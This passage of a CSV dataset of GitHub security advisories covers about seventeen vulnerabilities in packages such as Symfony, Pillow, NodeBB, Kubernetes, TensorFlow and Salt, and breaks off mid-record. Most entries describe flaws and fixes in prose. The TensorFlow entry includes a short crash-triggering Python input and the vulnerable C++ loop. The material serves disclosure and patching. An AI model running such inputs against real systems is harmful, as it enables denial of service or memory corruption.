+1.4.0,GHSA-qw36-p97w-vcqr,2021-12-01T14:36:09Z,2021-11-24T20:05:22Z,,['CVE-2021-41268'],Cookie persistence after password changes in symfony/security-bundle,"Description
+-----------
+
+Since the rework of the Remember me cookie in Symfony 5.3, the cookie is not invalidated anymore when the user changes its password.
+
+Attackers can therefore maintain their access to the account even if the password is changed as long as they have had the chance to login once and get a valid remember me cookie.
+
+Resolution
+----------
+
+Symfony now makes the password part of the signature by default. In that way, when the password changes then the cookie is not valid anymore.
+
+The patch for this issue is available [here](https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc) for branch 5.3.
+
+Credits
+-------
+
+We would like to thank Thibaut Decherit for reporting the issue and Wouter J for fixing the issue.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/security-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.3.0'}, {'fixed': '5.3.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-qw36-p97w-vcqr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41268'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/pull/44243'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/36a808b857cd3240244f4b224452fb1e70dc6dfc'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/releases/tag/v5.3.12'}]","{'cwe_ids': ['CWE-384'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-24T20:00:03Z', 'nvd_published_at': '2021-11-24T19:15:00Z'}"
+1.4.0,GHSA-77vh-xpmg-72qh,2021-11-24T19:43:35Z,2021-11-18T16:02:41Z,,[],Clarify `mediaType` handling,"### Impact
+In the OCI Image Specification version 1.0.1 and prior, manifest and index documents are not self-describing and documents with a single digest could be interpreted as either a manifest or an index.
+
+### Patches
+The Image Specification will be updated to recommend that both manifest and index documents contain a `mediaType` field to identify the type of document.
+Release [v1.0.2](https://github.com/opencontainers/image-spec/releases/tag/v1.0.2) includes these updates.
+
+### Workarounds
+Software attempting to deserialize an ambiguous document may reject the document if it contains both “manifests” and “layers” fields or “manifests” and “config” fields.
+
+### References
+https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in https://github.com/opencontainers/image-spec
+* Email us at [security@opencontainers.org](mailto:security@opencontainers.org)
+* https://github.com/opencontainers/image-spec/commits/v1.0.2
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/image-spec'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/image-spec/security/advisories/GHSA-77vh-xpmg-72qh'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/image-spec/commit/693428a734f5bab1a84bd2f990d92ef1111cd60c'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencontainers/image-spec'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/image-spec/releases/tag/v1.0.2'}]","{'cwe_ids': ['CWE-843'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-17T23:13:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7g47-xxff-9p85,2021-10-13T17:28:16Z,2021-11-19T20:39:44Z,,['CVE-2021-41868'],Remote unauthenticated attackers able to upload files in Onionshare,OnionShare 2.3 before 2.4 allows remote unauthenticated attackers to upload files on a non-public node when using the --receive functionality. ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'onionshare-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3'}, {'fixed': '2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41868'}, {'type': 'WEB', 'url': 'https://github.com/onionshare/onionshare/issues/1396'}, {'type': 'WEB', 'url': 'https://github.com/onionshare/onionshare/pull/1404'}, {'type': 'PACKAGE', 'url': 'https://github.com/onionshare/onionshare'}, {'type': 'WEB', 'url': 'https://www.ihteam.net/advisory/onionshare/'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T15:16:37Z', 'nvd_published_at': '2021-10-04T14:15:00Z'}"
+1.4.0,GHSA-3xv8-3j54-hgrp,2023-09-05T09:18:07Z,2021-11-03T18:04:53Z,,['CVE-2020-10378'],Out-of-bounds read in Pillow,"In `libImaging/PcxDecode.c` in Pillow before 7.1.0, an out-of-bounds read can occur when reading PCX files where `state->shuffle` is instructed to read beyond `state->buffer`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10378'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/issues/4750'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/4538'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/6a83e4324738bb0452fbe8074a995b1c73f08de7#diff-9478f2787e3ae9668a15123b165c23ac'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/blob/7872b0a91b4d980f749e6d75a81f8cc1af32829f/vulns/pillow/PYSEC-2020-77.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commits/master/src/libImaging'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BEBCPE4F2VHTIT6EZA2YZQZLPVDEBJGD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HOKHNWV2VS5GESY7IBD237E7C6T3I427/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.3.html'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/7.1.0.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-1/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4430-2/'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T17:26:02Z', 'nvd_published_at': '2020-06-25T19:15:00Z'}"
+1.4.0,GHSA-wmpv-c2jp-j2xg,2021-11-15T22:27:38Z,2021-11-15T23:28:18Z,,[],ERC1155Supply vulnerability in OpenZeppelin Contracts,"When ERC1155 tokens are minted, a callback is invoked on the receiver of those tokens, as required by the spec. When including the `ERC1155Supply` extension, total supply is not updated until after the callback, thus during the callback the reported total supply is lower than the real number of tokens in circulation.
+
+### Impact
+If a system relies on accurately reported supply, an attacker may be able to mint tokens and invoke that system after receiving the token balance but before the supply is updated.
+
+### Patches
+A fix is included in version 4.3.3 of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`.
+
+### Workarounds
+If accurate supply is relevant, do not mint tokens to untrusted receivers.
+
+### Credits
+The issue was identified and reported by @ChainSecurityAudits.
+
+### For more information
+Read [TotalSupply Inconsistency in ERC1155 NFT Tokens](https://medium.com/chainsecurity/totalsupply-inconsistency-in-erc1155-nft-tokens-8f8e3b29f5aa) by @ChainSecurityAudits for a more detailed breakdown.
+
+If you have any questions or comments about this advisory, email us at security@openzeppelin.com.",[],"[{'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.3.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@openzeppelin/contracts-upgradeable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.3.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-wmpv-c2jp-j2xg'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/openzeppelin-contracts'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:27:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vf7h-6246-hm43,2021-11-18T21:49:46Z,2021-11-19T20:18:54Z,,['CVE-2021-39198'],The disqualify lead action may be executed without CSRF token check,"### Summary
+The attacker is able to disqualify any Lead with a Cross-Site Request Forgery (CSRF) attack.
+
+### Workarounds
+There are no workarounds that address this vulnerability.
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'oro/crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '4.1.17'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'oro/crm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/oroinc/crm/security/advisories/GHSA-vf7h-6246-hm43'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39198'}, {'type': 'PACKAGE', 'url': 'https://github.com/oroinc/crm'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-18T21:49:46Z', 'nvd_published_at': '2021-11-19T22:15:00Z'}"
+1.4.0,GHSA-hf2m-j98r-4fqw,2021-12-01T15:06:58Z,2021-11-30T22:21:05Z,,['CVE-2021-43786'],API token verification can be bypassed in NodeBB ,"### Impact
+Incorrect logic present in the token verification step unintentionally allowed master token access to the API.
+
+### Patches
+The vulnerability has been patch as of v1.18.5.
+
+### Workarounds
+Cherry-pick commit hash 04dab1d550cdebf4c1567bca9a51f8b9ca48a500 to receive this patch in lieu of a full upgrade.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@nodebb.org](mailto:security@nodebb.org)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodebb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.18.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hf2m-j98r-4fqw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43786'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/commit/04dab1d550cdebf4c1567bca9a51f8b9ca48a500'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/nodebb-remote-code-execution-with-one-shot/'}, {'type': 'PACKAGE', 'url': 'https://github.com/NodeBB/NodeBB'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/releases/tag/v1.18.5'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T14:35:05Z', 'nvd_published_at': '2021-11-29T20:15:00Z'}"
+1.4.0,GHSA-p49h-hjvm-jg3h,2021-11-03T17:28:10Z,2021-11-03T18:05:04Z,,['CVE-2020-5312'],PCX P mode buffer overflow in Pillow,libImaging/PcxDecode.c in Pillow before 6.2.2 has a PCX P mode buffer overflow.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5312'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/93b22b846e0269ee9594ff71a72bec02d2bea8fd'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0566'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0578'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0580'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0681'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0683'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0694'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-db/blob/7872b0a91b4d980f749e6d75a81f8cc1af32829f/vulns/pillow/PYSEC-2020-83.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2MMU3WT2X64GS5WHDPKKC2WZA7UIIQ3A/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DUMIBUYGJRAVJCTFUWBRLVQKOUTVX5P/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/6.2.2.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4272-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4631'}]","{'cwe_ids': ['CWE-120'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T17:28:10Z', 'nvd_published_at': '2020-01-03T01:15:00Z'}"
+1.4.0,GHSA-2r2v-q399-qq93,2021-11-10T19:44:31Z,2021-11-10T19:45:02Z,,['CVE-2021-22051'],Request injection in Spring Cloud Gateway,"Applications using Spring Cloud Gateway are vulnerable to specifically crafted requests that could make an extra request on downstream services. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.5+, 2.2.x users should upgrade to 2.2.10.RELEASE or newer.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.cloud:spring-cloud-gateway'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.cloud:spring-cloud-gateway'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.10.RELEASE0.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.10.RELEASE'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22051'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2021-22051'}]","{'cwe_ids': ['CWE-352', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-09T21:08:14Z', 'nvd_published_at': '2021-11-08T14:15:00Z'}"
+1.4.0,GHSA-f5f7-6478-qm6p,2021-11-01T17:26:17Z,2021-11-01T17:32:28Z,,['CVE-2021-25741'],Files or Directories Accessible to External Parties in kubernetes,"A security issue was discovered in Kubernetes where a user may be able to create a container with subpath volume mounts to access files & directories outside of the volume, including on the host filesystem.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.19.15'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.20.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.21.0'}, {'fixed': '1.21.5'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.22.0'}, {'fixed': '1.22.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/bottlerocket-os/bottlerocket/security/advisories/GHSA-f5f7-6478-qm6p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25741'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/104980'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/nyfdhK24H7s'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211008-0006/'}]","{'cwe_ids': ['CWE-20', 'CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T17:26:17Z', 'nvd_published_at': '2021-09-20T17:15:00Z'}"
+1.4.0,GHSA-6mcm-j9cj-3vc3,2021-11-03T14:49:19Z,2021-11-03T17:30:35Z,,['CVE-2021-41973'],Infinite loop in Apache MINA,"In Apache MINA, a specifically crafted, malformed HTTP request may cause the HTTP Header decoder to loop indefinitely. The decoder assumed that the HTTP Header begins at the beginning of the buffer and loops if there is more data than expected. Please update MINA to 2.1.5 or greater.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.mina:mina-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.mina:mina-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41973'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b907da9340d5ff4e6c1a4798ef4e79700a668657f27cca8a39e9250%40%3Cdev.mina.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/01/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/01/8'}]","{'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T19:48:48Z', 'nvd_published_at': '2021-11-01T09:15:00Z'}"
+1.4.0,GHSA-m2v2-8227-59f5,2021-11-24T19:00:59Z,2021-11-23T17:54:39Z,,['CVE-2021-22967'],Exposure of sensitive information in concrete5/core,"In Concrete CMS (formerly concrete 5) below 8.5.7, IDOR Allows Unauthenticated User to Access Restricted Files If Allowed to Add Message to a Conversation.To remediate this, a check was added to verify a user has permissions to view files before attaching the files to a message in ""add / edit message”.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22967'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/869612'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/857-release-notes'}]","{'cwe_ids': ['CWE-200', 'CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:40:20Z', 'nvd_published_at': '2021-11-19T19:15:00Z'}"
+1.4.0,GHSA-qgmg-gppg-76g5,2021-11-03T14:46:00Z,2021-11-03T17:34:45Z,,['CVE-2021-3765'],Inefficient Regular Expression Complexity in validator.js,validator.js prior to 13.7.0 is vulnerable to Inefficient Regular Expression Complexity,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'validator'}, 'ecosystem_specific': {'affected_functions': ['validator.rtrim']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '13.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3765'}, {'type': 'WEB', 'url': 'https://github.com/validatorjs/validator.js/commit/496fc8b2a7f5997acaaec33cc44d0b8dba5fb5e1'}, {'type': 'PACKAGE', 'url': 'https://github.com/validatorjs/validator.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/c37e975c-21a3-4c5f-9b57-04d63b28cfc9'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-03T14:46:00Z', 'nvd_published_at': '2021-11-02T07:15:00Z'}"
+1.4.0,GHSA-j3jw-j2j8-2wv9,2021-11-15T14:43:39Z,2021-11-10T20:58:03Z,,['CVE-2021-43569'],Improper Verification of Cryptographic Signature in starkbank-ecdsa,"The verify function in the Stark Bank .NET ECDSA library (ecdsa-dotnet) 1.3.1 fails to check that the signature is non-zero, which allows attackers to forge signatures on arbitrary messages.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'starkbank-ecdsa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43569'}, {'type': 'PACKAGE', 'url': 'https://github.com/starkbank/ecdsa-dotnet'}, {'type': 'WEB', 'url': 'https://github.com/starkbank/ecdsa-dotnet/releases/tag/v1.3.2'}, {'type': 'WEB', 'url': 'https://research.nccgroup.com/2021/11/08/technical-advisory-arbitrary-signature-forgery-in-stark-bank-ecdsa-libraries/'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-10T18:26:13Z', 'nvd_published_at': '2021-11-09T22:15:00Z'}"
+1.4.0,GHSA-374m-jm66-3vj8,2021-11-08T21:49:22Z,2021-11-10T18:41:47Z,,['CVE-2021-41226'],Heap OOB in `SparseBinCount`,"### Impact
+The [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/bincount_op.cc#L353-L417) of `SparseBinCount` is vulnerable to a heap OOB:
+
+```python
+import tensorflow as tf
+
+
+tf.raw_ops.SparseBincount(
+ indices=[[0],[1],[2]]
+ values=[0,-10000000]
+ dense_shape=[1,1]
+ size=[1]
+ weights=[3,2,1]
+ binary_output=False)
+```
+
+This is because of missing validation between the elements of the `values` argument and the shape of the sparse output:
+
+
+```cc
+for (int64_t i = 0; i < indices_mat.dimension(0); ++i) {
+ const int64_t batch = indices_mat(i, 0);
+ const Tidx bin = values(i);
+ ...
+ out(batch, bin) = ...;
+}
+```
+
+### Patches
+We have patched the issue in GitHub commit [f410212e373eb2aec4c9e60bf3702eba99a38aba](https://github.com/tensorflow/tensorflow/commit/f410212e373eb2aec4c9e60bf3702eba99a38aba).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-374m-jm66-3vj8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41226'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f410212e373eb2aec4c9e60bf3702eba99a38aba'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:49:22Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-jcjx-c3j3-44pr,2021-11-08T21:09:02Z,2021-11-10T16:44:12Z,,[],Insufficient Session Expiration in @cyyynthia/tokenize,"### Impact
+A bug introduced in version 1.1.0 made Tokenize generate faulty tokens with NaN as a generation date. As a result, tokens would not properly expire and remain valid regardless of the `lastTokenReset` field.
+
+### Patches
+Version 1.1.3 contains a patch that'll invalidate these faulty tokens and make new ones behave as expected.
+
+### Workarounds
+None. Tokens do not hold the necessary information to perform invalidation anymore.
+
+### References
+PR #1
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [github.com/cyyynthia/tokenize](https://github.com/cyyynthia/tokenize)
+* Email us at [cynthia@cynthia.dev](mailto:cynthia@cynthia.dev)
+",[],"[{'package': {'ecosystem': 'npm', 'name': '@cyyynthia/tokenize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cyyynthia/tokenize/security/advisories/GHSA-jcjx-c3j3-44pr'}, {'type': 'PACKAGE', 'url': 'https://github.com/cyyynthia/tokenize'}]","{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:09:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pf7h-h2wq-m7pg,2022-07-05T22:05:39Z,2021-11-21T00:00:58Z,,['CVE-2021-21996'],Exposure of Resource to Wrong Sphere in salt,"An issue was discovered in SaltStack Salt before 3003.3. A user who has control of the source, and source_hash URLs can gain full file system access as root on a salt minion.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'salt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3003.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21996'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-pf7h-h2wq-m7pg'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/salt/PYSEC-2021-318.yaml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/11/msg00017.html'}, {'type': 'WEB', 'url': 